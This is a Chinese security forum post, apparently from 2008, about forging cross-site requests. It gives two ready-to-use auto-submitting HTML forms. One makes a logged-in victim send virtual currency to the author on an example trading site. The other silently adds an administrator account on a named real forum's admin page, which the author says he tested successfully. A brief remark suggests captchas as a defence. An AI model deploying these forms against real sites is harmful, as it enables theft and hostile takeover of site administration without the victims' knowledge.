|
 
- 帖子
- 270
- 积分
- 733
- 威望
- 1168
- 金钱
- 874
- 在线时间
- 2 小时
  
|
[讨论]跨站的另类利用
议题提交:风蓝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
以前从来没研究过什么跨站~甚至根本不清楚跨站攻击是什么~呵呵
今天看到一个跨站的动画~觉得很有趣~就是自己做一个别人站的添加管理员的页面,想办法让对方的管理员点击.
我就想这种方法估计很多程序都可以成功利用起来~关键就是要能想办法让对方执行你的页面地址~
这里我们不谈如何让别人点你的页面和如何添加用户了~
刚才在baidu上游戏交易,突然想到~
那些游戏交易站如果用跨站来实现赠送对方积分或游戏币或道具等等可不可行?
下面都是假想,没有经过实践过的~
首先我们分析一下,跨站就是自己够造一个页面,想办法让别人打开,获取他的cookies进行cookie欺骗或是直接利用他的cookie进行我们指定的操作.
打个比方:
某网站http://www.163.com是一个交易网站.
我自己的用户名:bwind 另外一个用户:flysky
该网站里有一种虚拟货币,类似QQB的那种.而这种货币是可以互相赠送给其他用户的.赠送的方法就是http://www.163.com/visite.asp这个页面~
这个页面需要填写收货人的用户名,以及送出去货币的数字.我们把这些都记下来.查看该页面源文件,找到form表单提交地址,我们找到的是http://www.163.com/visite.asp?action=to
现在我们就可以开始构造跨站脚本了.
在本机新建立一个a.htm的文件,内容如下:
--------------------------------
<form action="http://www.163.com/visite.asp?action=to" method=post>
<table cellpadding="2" cellspacing="1" border="0" width="95%" class="tableBorder" align=center>
<input type=text name="username2" size=30 value="bwind">收货人
<input type="password" name="password2" size=33 value="500">赠送数量
<input type="submit" name="Submit" value="赠送">
</table>
</form>
<script language="javascript">
this.document.forms[0].submit();
location.href('index.asp');
</script>
------------------------------
这段代码的意思就是直接post我们的内容到http://www.163.com/visite.asp?action=to这个地址,如果别人正好登陆www.163.com并保存了cookie了的话,他只要一打开我们构造的这个页面~他就会直接送给我(bwind) 500个货币.
不知道这东西以前有没有人写过~第一次研究跨站~给我的感觉就是危害太大了~根本不需要程序有什么漏洞,而是只要你会欺骗别人进入到你的页面.呵呵.
我自己想到的这种防范方法就是在一些重要数据提交的地方加上验证码~这样的话在怎么跨也没用了:)
再发个洞网加管理员的页面~自己测试成功了的~
--------------------------
<form action="http://bbs.sasf.cn/admin/admin.asp?action=savenew" method=post>
<table cellpadding="2" cellspacing="1" border="0" width="95%" class="tableBorder" align=center>
<tr>
<th colspan=2 height=23>管理员管理--添加管理员</th>
</tr>
<tr>
<td width="26%" align="right" class=forumrow>后台登录名称:</td>
<td width="74%" class=forumrow>
<input type=text name="username2" size=30 value=testkz> (可与注册名不同)
</td>
</tr>
<tr>
<td width="26%" align="right" class=forumrow >后台登录密码:</td>
<td width="74%" class=forumrow>
<input type="password" name="password2" size=33 value=testkz> (可与注册密码不同)
</td>
</tr>
<tr>
<td width="26%" align="right" class=forumrow height=23 >前台用户名称:</td>
<td width="74%" class=forumrow><input type=text name="username1" size=30 value=无影> (本选项填写后不允许修改)
</td>
</tr>
<tr>
<td width="26%" align="right" class=forumrow height=23>在前台显示为管理员:</td>
<td width="74%" class=forumrow>是<input name="isdisp" type=radio value="1" checked> 否<input name="isdisp" type=radio value="0"> (如改为显示请到用户管理中编辑资料)
</td>
</tr>
<tr align="center">
<td colspan="2" class=forumrow>
<input type="submit" name="Submit" value="添 加">
</td>
</tr>
</table>
</form>
<script language="javascript">
this.document.forms[0].submit();
location.href('index.asp');
</script>
--------------------------我的Blog:http://www.tantao.cn
帖子181 精华12 积分3615 阅读权限100 性别男 在线时间327 小时 注册时间2005-4-12 最后登录2007-11-17 查看详细资料TOP 爱要怎么说出口
lucky_feng 
晶莹剔透§烈日灼然 |
|
发表于 2008-7-24 17:23
| 
